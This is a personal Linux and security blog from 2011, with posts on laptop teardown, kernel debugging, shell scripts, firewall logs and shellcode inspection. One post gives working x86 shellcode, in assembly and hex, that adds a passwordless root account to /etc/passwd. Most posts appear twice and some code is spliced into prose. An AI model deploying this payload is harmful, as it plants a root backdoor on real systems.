We are all well aware of the tragic earthquake and tsunami that caused massive damage and great loss of life to the Japanese coastal areas. Also the situation seems very critical at the Fukushima Daiichi nuclear facility where engineers are attempting their best to avert a possible meltdown. My prayers go out to all the people and their families affected and I pray that that they are successful in stabilizing the situation. Also I salute all the people currently involved in the rescue and stabilization process. You are the real heroes guys...
Wednesday, March 16, 2011
Sunday, March 13, 2011
Dell Studio 1535 cleaning/disassembly
The temperature sensors on procyon [My Dell Studio 1535] laptop were constantly hitting abnormal values recently. CPU kept on idling at around 60C, even after my previous post on the fix for lm_sensors configuration applied. So I knew that it was time I opened the girl up and do her some good'ol fashioned cleaning. So I borrowed a cam, took out my toolbox, acquired some Thermal Compound [Shin-Etsu Microsi's G-751 Thermal Paste (thanks Shray!)] from a good friend, added some Pink Floyd on my playlist and got to work. Here are a few pics of the internals for anyone's viewing pleasure since I could not find any decent teardown images of the same model on the web. Enjoy....
Backplate opened, Fan/Heat-sink assembly and processor removed |
Close-up of the first image. |
The processor[Top]: Intel T5750 [2GHz, Socket-P, 2MBL2, 667 FSB] |
The processor[Bottom] |
Fan/Heat-sink assembly [Top] |
Fan/Heat-sink assembly [Bottom] [Note the thermal pads for the MCH and GFX chips] |
Fan/Heatsink assembly [Top, Fan Removed] |
Fan/Heat-sink assembly [Bottom, Fan Removed] |
Fan(Dirty) [Top] |
Fan(Dirty) [Bottom] |
Partially Cleaned Heat-sink Fins |
ATI Mobility Radeon HD3450 256MB [The 2 chips on the left are the 128MBx2(Samsung) RAMDACs] |
The Intel 965PM MCH |
The Intel MCH and The Socket-P processor socket |
The WPAN and WLAN[Broadcom BCM4312] cards. |
Nanya 1GB DDR2 PC2-5300 @ 333 MHz x2 RAM Cards |
The HDD [Western Digital WD3200BPVT] and The DVD drive |
After a thorough cleaning and application of new thermal grease, the temps have dropped significantly by at least ~10C
End result: a cool and quiet system and a wholly satisfied conscience :)
Labels:
cleaning,
coretemp,
cpu,
dell,
disassembly,
hardware,
lm_sensors,
studio 1535
Sunday, March 6, 2011
detailed kernel bootup debug messages
Users like me prefer as much debugging output in applications as possible because this makes performance and stability issues easy to understand. This also allows one to see what all is going on behind the scenes for crash debugging. A few amendments can be added to the kernel boot parameters of a Linux kernel to allow for detailed messages and verbose output:
By modifying the 'kernel' line in grub or editing the relevant boot file under /boot/grub and adding the following[in bold]:
debug = activates internal debugging.
ignore_loglevel = ignores any sort of log level and maximizes debug output.
log_buf_len = increases the log buffer length to 10 MiB
print_fatal_signals = print any fatal signals.
LOGLEVEL = enables level 8 logging.
earlyprintk = enables early printing of messages to the vga screen
,keep = keeps the messages on for longer.
sched_debug = Enables verbose scheduler debug messages.
Ref:
http://www.kernel.org/doc/Documentation/kernel-parameters.txt
https://wiki.archlinux.org/index.php/GRUB#Advanced_Debugging
By modifying the 'kernel' line in grub or editing the relevant boot file under /boot/grub and adding the following[in bold]:
kernel /boot/vmlinuz26 root=/dev/disk/by-label/Arch ro debug ignore_loglevel log_buf_len=10M print_fatal_signals=1 LOGLEVEL=8 earlyprintk=vga,keep sched_debugheavy debugging can be easily activated.
debug = activates internal debugging.
ignore_loglevel = ignores any sort of log level and maximizes debug output.
log_buf_len = increases the log buffer length to 10 MiB
print_fatal_signals = print any fatal signals.
LOGLEVEL = enables level 8 logging.
earlyprintk = enables early printing of messages to the vga screen
,keep = keeps the messages on for longer.
sched_debug = Enables verbose scheduler debug messages.
Ref:
http://www.kernel.org/doc/Documentation/kernel-parameters.txt
https://wiki.archlinux.org/index.php/GRUB#Advanced_Debugging
Friday, March 4, 2011
customized slow output on a console
One of the primary scripts I run on my desktop embedded urxvt terminals is an active connections display script. Its primary function is to utilize 'netstat' and 'lsof' to display all TCP/UDP connections to/from my system. The problem comes with running apps such as firefox or feed readers where multiple connections are established that most of the output scrolls away very fast. So I customized the script to slowly output line by line:
#!/bin/bash
echo "" > connpoll.log
function read_file()
{
count=0
while read line
do
echo -e "$line"
count=$[$count+1]
sleep .15
if [ $count -eq 12 ]
then
count=0
sleep 3
fi
done < connpoll.log
}
while [ 1 ]
do
echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA LSOF==<<<<<<<<<<<" > connpoll.log
lsof -w | grep -e TCP -e UDP >> connpoll.log
echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA NETSTAT==<<<<<<<<<<<" >> connpoll.log
netstat --tcp --udp -e -e -a --raw --program -v >> connpoll.log
read_file
sleep 8
done
The infinite while loop runs the 2 commands, directs the output to a file (connpoll.log) and executes the function 'read_file'. 'read_file' takes the file and feeds it to an internal read in the while loop which simply echos a line from the file. The 'sleep .15' provides a small time break between each line and makes the output smooth.
The script works flawlessly and with the least overhead that I could accomplish.
#!/bin/bash
echo "" > connpoll.log
function read_file()
{
count=0
while read line
do
echo -e "$line"
count=$[$count+1]
sleep .15
if [ $count -eq 12 ]
then
count=0
sleep 3
fi
done < connpoll.log
}
while [ 1 ]
do
echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA LSOF==<<<<<<<<<<<" > connpoll.log
lsof -w | grep -e TCP -e UDP >> connpoll.log
echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA NETSTAT==<<<<<<<<<<<" >> connpoll.log
netstat --tcp --udp -e -e -a --raw --program -v >> connpoll.log
read_file
sleep 8
done
The infinite while loop runs the 2 commands, directs the output to a file (connpoll.log) and executes the function 'read_file'. 'read_file' takes the file and feeds it to an internal read in the while loop which simply echos a line from the file. The 'sleep .15' provides a small time break between each line and makes the output smooth.
The script works flawlessly and with the least overhead that I could accomplish.
exploitdb svn up again
For the past 2 weeks, a svn checkout of exploit db always resulted in:
svn: Network connection closed unexpectedly
Today, finally its up again. Grab a local copy via:
$] svn co svn://www.exploit-db.com/ exploitdb
or to update a local copy, just do a 'svn update' in the checkout folder.
svn: Network connection closed unexpectedly
Today, finally its up again. Grab a local copy via:
$] svn co svn://www.exploit-db.com/
or to update a local copy, just do a 'svn update' in the checkout folder.
Thursday, February 24, 2011
dangers of publicly disclosed weaponized exploits
POC (Proof Of Concept) exploits are very easy to find. One doesn't have to look further than a Google search for countless lists. Similarly, weaponized versions are also available through the same channels. Skiddies never had it so good when to comes to downloading, compiling and owning the next door neighbour's box. But sometimes such perfect pieces of art have a terrible secret.
Most skiddies never bother to even look at the code before compiling/running them. They just can't wait to see the familiar 'C:\..' or '#' prompts on their consoles. The payloads provided with any exploit can be a proper bind/reverse stager or it may even be a piece of malware!
Lets be honest and think like a skiddie for once. I want to pwn a box, I fire up nmap and see that port xxx is open on the other end. I google for a 'port xxx exploit' and get some code from a disclosure website written in C. Instructions say to compile and run. A small look at the code may not reveal any problems, at least with the higher level C but does the shellcode checkout?? For that matter it may well be a double edged sword. It could very well download something on the skiddie's box, run it and provide his system and the victim's system to the 'real' cracker.
There are ways by which one can analyze payloads by converting them back to assembly. By using a simple disassembler, the original assembly code can be rebuilt and understood.
As a simple example, lets take the following shellcode:
\x31\xc0\x40\x89\xc3\xcd\x80
Any shellcoder would easily recognize this as a simple exit() syscall shellcode used as a "hello world!" alternative in teaching shellcoding. All we need to do is to convert, write it as a binary file and disassemble it. The assembler we are going to use is ndisasm (Netwide Disassembler).
I have written a small python script for this very purpose:
Also we can take the alphanumeric version of the shellcode I posted a while back and get the same output:
python2 shellcode_2_asm.py \xeb\x38\x5e\x31\xc0\x88\x46\x0b\x88\x46\x2b\xc6\x46\x2a\x0a\x8d\x5e\x0c\x89\x5e\x2c\x8d\x1e\x66\xb9\x42\x04\x66\xba\xa4\x01\xb0\x05\xcd\x80\x89\xc3\x31\xd2\x8b\x4e\x2c\xb2\x1f\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x74\x6f\x6f\x72\x3a\x3a\x30\x3a\x30\x3a\x74\x30\x30\x72\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x23
[+]normalized hexstring: eb385e31c088460b88462bc6462a0a8d5e0c895e2c8d1e66b9420466baa401b005cd8089c331d28b4e2cb21fb004cd80b006cd80b00131dbcd80e8c3ffffff2f6574632f70617373776423746f6f723a3a303a303a743030723a2f726f6f743a2f62696e2f626173682023
[++++++++++++++++ASM DUMP++++++++++++++++]
00000000 EB38 jmp short 0x3a
00000002 5E pop esi
00000003 31C0 xor eax,eax
00000005 88460B mov [esi+0xb],al
00000008 88462B mov [esi+0x2b],al
0000000B C6462A0A mov byte [esi+0x2a],0xa
0000000F 8D5E0C lea ebx,[esi+0xc]
00000012 895E2C mov [esi+0x2c],ebx
00000015 8D1E lea ebx,[esi]
00000017 66B94204 mov cx,0x442
0000001B 66BAA401 mov dx,0x1a4
0000001F B005 mov al,0x5
00000021 CD80 int 0x80
00000023 89C3 mov ebx,eax
00000025 31D2 xor edx,edx
00000027 8B4E2C mov ecx,[esi+0x2c]
0000002A B21F mov dl,0x1f
0000002C B004 mov al,0x4
0000002E CD80 int 0x80
00000030 B006 mov al,0x6
00000032 CD80 int 0x80
00000034 B001 mov al,0x1
00000036 31DB xor ebx,ebx
00000038 CD80 int 0x80
0000003A E8C3FFFFFF call dword 0x2
0000003F 2F das /*NOTE: This point onwards is the string
00000040 657463 gs jz 0xa6 *db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'.
00000043 2F das *The disassembler assumes the string as instructions
00000044 7061 jo 0xa7 *and creates the assembly for it.
00000046 7373 jnc 0xbb *So it is safe to ignore all the code below.
00000048 .........
[++++++++++++++++ASM DUMP++++++++++++++++]
A few points to note here:
1. The script assumes 32 bit shellcode, to vary it for 64 bit, change the line "ndisasm -b 32 binary" to "ndisasm -b 64 binary"
2. Downloading and running exploits should be done with utmost caution and if possible use custom payloads.
3. DONT BE A SKIDDIE!
Most skiddies never bother to even look at the code before compiling/running them. They just can't wait to see the familiar 'C:\..' or '#' prompts on their consoles. The payloads provided with any exploit can be a proper bind/reverse stager or it may even be a piece of malware!
Lets be honest and think like a skiddie for once. I want to pwn a box, I fire up nmap and see that port xxx is open on the other end. I google for a 'port xxx exploit' and get some code from a disclosure website written in C. Instructions say to compile and run. A small look at the code may not reveal any problems, at least with the higher level C but does the shellcode checkout?? For that matter it may well be a double edged sword. It could very well download something on the skiddie's box, run it and provide his system and the victim's system to the 'real' cracker.
There are ways by which one can analyze payloads by converting them back to assembly. By using a simple disassembler, the original assembly code can be rebuilt and understood.
As a simple example, lets take the following shellcode:
\x31\xc0\x40\x89\xc3\xcd\x80
Any shellcoder would easily recognize this as a simple exit() syscall shellcode used as a "hello world!" alternative in teaching shellcoding. All we need to do is to convert, write it as a binary file and disassemble it. The assembler we are going to use is ndisasm (Netwide Disassembler).
I have written a small python script for this very purpose:
#!/usr/bin/pythonLets try it shall we:
#s4ndman - shellcode to assembly conversion script for shellcode inspection.
#Requires: ndisasm
import os
import sys
import binascii
if len(sys.argv) < 2:
print "[i]run syntax:"
print "[i]"+sys.argv[0]+" hexcode"
print "[i]example:"
print "[i]"+sys.argv[0]+" \\x31\\xc0\\x40\\x89\\xc3\\xcd\\x80"
sys.exit()
try:
f = open("binary", "wb")
except:
print "[-]file create error!"
sys.exit()
hstring = sys.argv[1].replace("\\x","")
hstring = hstring.replace("x","")
print "[+]normalized hexstring: "+hstring
hexstring = binascii.a2b_hex(hstring)
f.write(hexstring)
f.close()
print "[++++++++++++++++ASM DUMP++++++++++++++++]"
os.system("ndisasm -b 32 binary")
print "[++++++++++++++++ASM DUMP++++++++++++++++]"
os.system("rm binary")
sys.exit()
└─>>$] python2 shellcode_2_asm.py \x31\xc0\x40\x89\xc3\xcd\x80And there we go, the 32bit exit() syscall assembly.
[+]normalized hexstring: 31c04089c3cd80
[++++++++++++++++ASM DUMP++++++++++++++++]
00000000 31C0 xor eax,eax
00000002 40 inc eax
00000003 89C3 mov ebx,eax
00000005 CD80 int 0x80
[++++++++++++++++ASM DUMP++++++++++++++++]
Also we can take the alphanumeric version of the shellcode I posted a while back and get the same output:
python2 shellcode_2_asm.py \xeb\x38\x5e\x31\xc0\x88\x46\x0b\x88\x46\x2b\xc6\x46\x2a\x0a\x8d\x5e\x0c\x89\x5e\x2c\x8d\x1e\x66\xb9\x42\x04\x66\xba\xa4\x01\xb0\x05\xcd\x80\x89\xc3\x31\xd2\x8b\x4e\x2c\xb2\x1f\xb0\x04\xcd\x80\xb0\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xc3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x74\x6f\x6f\x72\x3a\x3a\x30\x3a\x30\x3a\x74\x30\x30\x72\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x23
[+]normalized hexstring: eb385e31c088460b88462bc6462a0a8d5e0c895e2c8d1e66b9420466baa401b005cd8089c331d28b4e2cb21fb004cd80b006cd80b00131dbcd80e8c3ffffff2f6574632f70617373776423746f6f723a3a303a303a743030723a2f726f6f743a2f62696e2f626173682023
[++++++++++++++++ASM DUMP++++++++++++++++]
00000000 EB38 jmp short 0x3a
00000002 5E pop esi
00000003 31C0 xor eax,eax
00000005 88460B mov [esi+0xb],al
00000008 88462B mov [esi+0x2b],al
0000000B C6462A0A mov byte [esi+0x2a],0xa
0000000F 8D5E0C lea ebx,[esi+0xc]
00000012 895E2C mov [esi+0x2c],ebx
00000015 8D1E lea ebx,[esi]
00000017 66B94204 mov cx,0x442
0000001B 66BAA401 mov dx,0x1a4
0000001F B005 mov al,0x5
00000021 CD80 int 0x80
00000023 89C3 mov ebx,eax
00000025 31D2 xor edx,edx
00000027 8B4E2C mov ecx,[esi+0x2c]
0000002A B21F mov dl,0x1f
0000002C B004 mov al,0x4
0000002E CD80 int 0x80
00000030 B006 mov al,0x6
00000032 CD80 int 0x80
00000034 B001 mov al,0x1
00000036 31DB xor ebx,ebx
00000038 CD80 int 0x80
0000003A E8C3FFFFFF call dword 0x2
0000003F 2F das /*NOTE: This point onwards is the string
00000040 657463 gs jz 0xa6 *db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'.
00000043 2F das *The disassembler assumes the string as instructions
00000044 7061 jo 0xa7 *and creates the assembly for it.
00000046 7373 jnc 0xbb *So it is safe to ignore all the code below.
00000048 .........
[++++++++++++++++ASM DUMP++++++++++++++++]
A few points to note here:
1. The script assumes 32 bit shellcode, to vary it for 64 bit, change the line "ndisasm -b 32 binary" to "ndisasm -b 64 binary"
2. Downloading and running exploits should be done with utmost caution and if possible use custom payloads.
3. DONT BE A SKIDDIE!
Wednesday, February 23, 2011
examining firewall log entries...
While going through the usual iptables log, its pretty interesting to see what all lurks out on the world wide web. There are some usual and unusual entries such as:
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=xxx.xxx.xx.x DST=yyy.yyy.yyy.yyy LEN=60 TOS=0x00 PREC=0x00 TTL=45 ID=61742 DF PROTO=TCP SPT=4993 DPT=23 SEQ=2106909432 ACK=0 WINDOW=5808 RES=0x00 SYN URGP=0 OPT (020405AC0402080A012E13D60000000001030300)
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=xx.xxx.xxx.x DST=yyy.yyy.yyy.yyy LEN=40 TOS=0x00 PREC=0x00 TTL=95 ID=256 PROTO=TCP SPT=6000 DPT=1433 SEQ=2031616000 ACK=0 WINDOW=16384 RES=0x00 SYN URGP=0
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=xxx.xxx.xx.xxx DST=yyy.yyy.yyy.yyy LEN=40 TOS=0x00 PREC=0x00 TTL=119 ID=256 DF PROTO=TCP SPT=12200 DPT=1080 SEQ=474681 ACK=0 WINDOW=8192 RES=0x00 SYN URGP=0
Which upon analysis reveal some pretty interesting facts...
1. Firstly I notice a lot of TCP Syn packets being denied at ports 1080, 3128, 8000, 8080 etc
2. Also a lot of attempts at ports 1433, 1434
3. And finally some random attempts at 22, 23, 25
Whats interesting is that all the source IPs are random and in some situations, there is a flag on 2 ports per IP.
These are what I think may be the causes:
1. A simple lookup would reveal the purpose of these ports as the following:
1080 : socks
3128 : squid-http
8000 : http-alt
8080 : http-proxy
With this, one can easily deduce that many systems over the web are intentionally/unintentionally checking for open proxies on random IP addresses. These may be normal boxes with scripts/programs running that generate random IPs or using old server connection logs. They may also be infected systems with malware performing the same task. This is one of the many ways lists of open proxies surface on underground websites.
2. These are the ports on which Microsoft SQL server typically listens on and may well be sought after by full blown malware looking for newer prey or automated scans running on a cracker's box.
3. These are usually ports for the typical ssh, telnet and smtp services and are most probably being scanned for vulnerabilities or vulnerable configurations by malware on rooted boxes or automated/active scans running on a cracker's box.
Its quite funny to see the intensity of these reports on the logs. Quite a few popup every hour or so. It is a reminder that a by just connecting a system to the internet without properly securing it can be pretty fatal. Its a dangerous WWW out there and web safety requires proper measures to be taken before connecting the wire.
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=xxx.xxx.xx.x DST=yyy.yyy.yyy.yyy LEN=60 TOS=0x00 PREC=0x00 TTL=45 ID=61742 DF PROTO=TCP SPT=4993 DPT=23 SEQ=2106909432 ACK=0 WINDOW=5808 RES=0x00 SYN URGP=0 OPT (020405AC0402080A012E13D60000000001030300)
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=xx.xxx.xxx.x DST=yyy.yyy.yyy.yyy LEN=40 TOS=0x00 PREC=0x00 TTL=95 ID=256 PROTO=TCP SPT=6000 DPT=1433 SEQ=2031616000 ACK=0 WINDOW=16384 RES=0x00 SYN URGP=0
localhost kernel: iptables DENIED: IN=ppp0 OUT= MAC= SRC=xxx.xxx.xx.xxx DST=yyy.yyy.yyy.yyy LEN=40 TOS=0x00 PREC=0x00 TTL=119 ID=256 DF PROTO=TCP SPT=12200 DPT=1080 SEQ=474681 ACK=0 WINDOW=8192 RES=0x00 SYN URGP=0
Which upon analysis reveal some pretty interesting facts...
1. Firstly I notice a lot of TCP Syn packets being denied at ports 1080, 3128, 8000, 8080 etc
2. Also a lot of attempts at ports 1433, 1434
3. And finally some random attempts at 22, 23, 25
Whats interesting is that all the source IPs are random and in some situations, there is a flag on 2 ports per IP.
These are what I think may be the causes:
1. A simple lookup would reveal the purpose of these ports as the following:
1080 : socks
3128 : squid-http
8000 : http-alt
8080 : http-proxy
With this, one can easily deduce that many systems over the web are intentionally/unintentionally checking for open proxies on random IP addresses. These may be normal boxes with scripts/programs running that generate random IPs or using old server connection logs. They may also be infected systems with malware performing the same task. This is one of the many ways lists of open proxies surface on underground websites.
2. These are the ports on which Microsoft SQL server typically listens on and may well be sought after by full blown malware looking for newer prey or automated scans running on a cracker's box.
3. These are usually ports for the typical ssh, telnet and smtp services and are most probably being scanned for vulnerabilities or vulnerable configurations by malware on rooted boxes or automated/active scans running on a cracker's box.
Its quite funny to see the intensity of these reports on the logs. Quite a few popup every hour or so. It is a reminder that a by just connecting a system to the internet without properly securing it can be pretty fatal. Its a dangerous WWW out there and web safety requires proper measures to be taken before connecting the wire.
Saturday, February 12, 2011
python proxy tester
Getting hold of proxy lists is a not a problem these days. A lot of websites provide pages upon pages of proxies but the issue arises when more than 60-70% of them don't work. Sitting and testing each one can be a pain so to ease the issue, I fired up medit and wrote the following script.
The script takes input as a file with the structure:
[ip]:[port]
code: http://pastebin.com/w5iardS4
The script takes input as a file with the structure:
code: http://pastebin.com/w5iardS4
lm_sensors and Tjunction-max
Recently, the temperature values being reported by lm_sensors on my linux-lap were becoming a point of concern. The fan and heatsink assembly had just been cleaned a few days earlier but still lm_sensors reported my CPU was at ~70C while idling! Even considering the fact that I live in a hot part of the world, the values were too high for this time of the year and for an idling CPU. Checking the logs and a bit of web research revealed the culprit:
└─>>$] dmesg | grep Tj
coretemp coretemp.0: TjMax is assumed as 100 C!
coretemp coretemp.1: TjMax is assumed as 100 C!
The Intel datasheet for a T5750 processor reports the designed Tj-max as 85C but gets detected as 100C, so lm_sensors was reporting the values with a +15C offset.
The bug seems to be in a recent git commit as explained in this thread: https://bbs.archlinux.org/viewtopic.php?pid=829902#p829902
Tjunction explained: http://www.techreaction.net/2009/10/14/guide-to-understanding-intel-temperatures/
UPDATE:
FIX: After discussing the issue with the devs on IRC, a small fix was suggested. Worked for me.
edit '/etc/sensors3.conf' and add the lines
chip "coretemp-*"
compute temp1 @-15,@+15
compute temp2 @-15,@+15
└─>>$] dmesg | grep Tj
coretemp coretemp.0: TjMax is assumed as 100 C!
coretemp coretemp.1: TjMax is assumed as 100 C!
The Intel datasheet for a T5750 processor reports the designed Tj-max as 85C but gets detected as 100C, so lm_sensors was reporting the values with a +15C offset.
The bug seems to be in a recent git commit as explained in this thread: https://bbs.archlinux.org/viewtopic.php?pid=829902#p829902
Tjunction explained: http://www.techreaction.net/2009/10/14/guide-to-understanding-intel-temperatures/
UPDATE:
FIX: After discussing the issue with the devs on IRC, a small fix was suggested. Worked for me.
edit '/etc/sensors3.conf' and add the lines
chip "coretemp-*"
compute temp1 @-15,@+15
compute temp2 @-15,@+15
Thursday, February 10, 2011
some old shellcode...
Going through some old files, I came across some old shellcode I had written. Nothing special but a small payload to append the /etc/passwd file. To be honest its not even that great because to use it, you need an exploit that provides uid=0 such as a kernel null pointer dereference. Anyway, here is the code:
;append_passwd.asm
;Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding password-less root account with login name "toor"
;Platform: linux/x86
;Size: 107 bytes
;Author: $andman
;BEGIN CODE
The compiled, alphanumeric code can be taken from exploitdb:
http://www.exploit-db.com/exploits/13579/
;append_passwd.asm
;Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding password-less root account with login name "toor"
;Platform: linux/x86
;Size: 107 bytes
;Author: $andman
;BEGIN CODE
Section .data;CODE END
global _start
_start:
jmp short callfunc
func:
pop esi
xor eax, eax
mov byte [esi+11], al
mov byte [esi+43], al
mov byte [esi+42], 0xa
lea ebx, [esi+12]
mov long [esi+44],ebx
lea ebx,[esi]
mov cx,1090
mov dx,0x1a4
mov al,0x05
int 0x80
mov long ebx, eax
xor edx,edx
mov ecx, [esi+44]
mov dl,31
mov al,0x04
int 0x80
mov al,0x06
int 0x80
mov al,0x01
xor ebx,ebx
int 0x80
callfunc:
call func
db '/etc/passwd#toor::0:0:t00r:/root:/bin/bash #XXXX'
The compiled, alphanumeric code can be taken from exploitdb:
http://www.exploit-db.com/exploits/13579/
Wednesday, February 9, 2011
sfuzz, a mutation file format fuzzer
I thought I might as well publish some code, well here is a little something I have been working on. A simple mutation fuzzer. It just does _dumb_ fuzzing for now but I intend to improve it for structural correctness while fuzzing and smarter fault injections. Not yet completed but It has already shown results, caused many apps to crash with mostly being Invalid reads and 1 Invalid write [dunno if exploitable? will check that out]. Anyway here is the code for the fuzzer. Also, I am thinking towards writing a smart generation fuzzer for structured non binaries. Anyway here is the code...
Source[Linux]:
http://pastebin.com/kVNyKsip
EDIT: A small bug... the randomization depends on the current time. This means to achieve a bit decent randomization, a sleep value of 1s is at least needed.
Source[Linux]:
http://pastebin.com/kVNyKsip
EDIT: A small bug... the randomization depends on the current time. This means to achieve a bit decent randomization, a sleep value of 1s is at least needed.
Multiple $PS1s with urxvt and xprop
Recently, I decided to embed terminals in my desktop and preferred that the prompt for them should be different than for a normal terminal window. It took a while but I finally achieved it. Embedding the terminals was easy as explained here:
https://wiki.archlinux.org/index.php/Openbox#Urxvt_in_the_background
and as for the different $PS1 prompts, I just modified my .bashrc with the following condition:
#BEGIN CODE#
winId=$(xprop -id $WINDOWID | grep "URxvtbg")
if [ "$winId" == "" ]
then
PS1="┌─\[\e[1;36m\][\u@\h]\[\e[m\].:\[\e[0;36m\][$(date +"%d/%m/%y-(%T)")]\[\e[m\]:.\[\e[1;36m\][\w]\[\e[m\]\n└─>>\[\e[1;32m\]$\[\e[m\]] "
else
PS1='[\u@\h \W]\$ '
fi
Basically, what this does is that it gets the window information from xprop using the $WINDOWID bash variable and looks for the specific name* that was assigned to this terminal. If found, applies a specific $PS1 value and if not, applies the other.
*Refer urxvt's man page for the switch '-name'.
https://wiki.archlinux.org/index.php/Openbox#Urxvt_in_the_background
and as for the different $PS1 prompts, I just modified my .bashrc with the following condition:
#BEGIN CODE#
winId=$(xprop -id $WINDOWID | grep "URxvtbg")
if [ "$winId" == "" ]
then
PS1="┌─\[\e[1;36m\][\u@\h]\[\e[m\].:\[\e[0;36m\][$(date +"%d/%m/%y-(%T)")]\[\e[m\]:.\[\e[1;36m\][\w]\[\e[m\]\n└─>>\[\e[1;32m\]$\[\e[m\]] "
else
PS1='[\u@\h \W]\$ '
fi
#END CODE#
Basically, what this does is that it gets the window information from xprop using the $WINDOWID bash variable and looks for the specific name* that was assigned to this terminal. If found, applies a specific $PS1 value and if not, applies the other.
*Refer urxvt's man page for the switch '-name'.
Sunday, February 6, 2011
Fortune for you!!
Almost all linux users are familiar with the fortune program. For new users, here is a small snippet:
Name:
fortune - print a random, hopefully interesting, adage
Description from the man page:
When fortune is run with no arguments it prints out a random epigram. Epigrams are divided into several categories.
Well, in order to fully utilize the program, I went ahead and wrote a small script that automatically displayed a random fortune everytime I logged in. Here is the script and all it requires is the notification daemon to be installed for your particular wm.
#!/bin/bash
sleep 3
notify-send "Hello $(whoami), Your Daily Fortune..." "$(fortune)"
Save it as fortune.sh and mark it as executable by:
chmod +x fortune.sh
and just add it to the post login scripts in your particular wm, openbox in my case so '~/.config/openbox/autostart.sh'
Name:
fortune - print a random, hopefully interesting, adage
Description from the man page:
When fortune is run with no arguments it prints out a random epigram. Epigrams are divided into several categories.
Well, in order to fully utilize the program, I went ahead and wrote a small script that automatically displayed a random fortune everytime I logged in. Here is the script and all it requires is the notification daemon to be installed for your particular wm.
#!/bin/bash
sleep 3
notify-send "Hello $(whoami), Your Daily Fortune..." "$(fortune)"
Save it as fortune.sh and mark it as executable by:
chmod +x fortune.sh
and just add it to the post login scripts in your particular wm, openbox in my case so '~/.config/openbox/autostart.sh'
Dreamers and Artists of our time...
There were the greats of old such as Picaso, Rembrandt, Dali etc etc... but of our time in the digital age, they still exist. I would just like to direct people to such masters of our time. Their mind and work produce awe to the colorful earth around us. I salute to them as their work has inspired me and artists all over . Some of whom I know
Ryan Bliss : Digital Blasphemy
Greg Marting : Art Of Greg Martin
Gary Tonge : Vision Afar
Rudolf Herczog : Rochr
Bjørn Breivik : http://breivik.deviantart.com/
and many more...
Ryan Bliss : Digital Blasphemy
Greg Marting : Art Of Greg Martin
Gary Tonge : Vision Afar
Rudolf Herczog : Rochr
Bjørn Breivik : http://breivik.deviantart.com/
and many more...
Subscribe to:
Posts (Atom)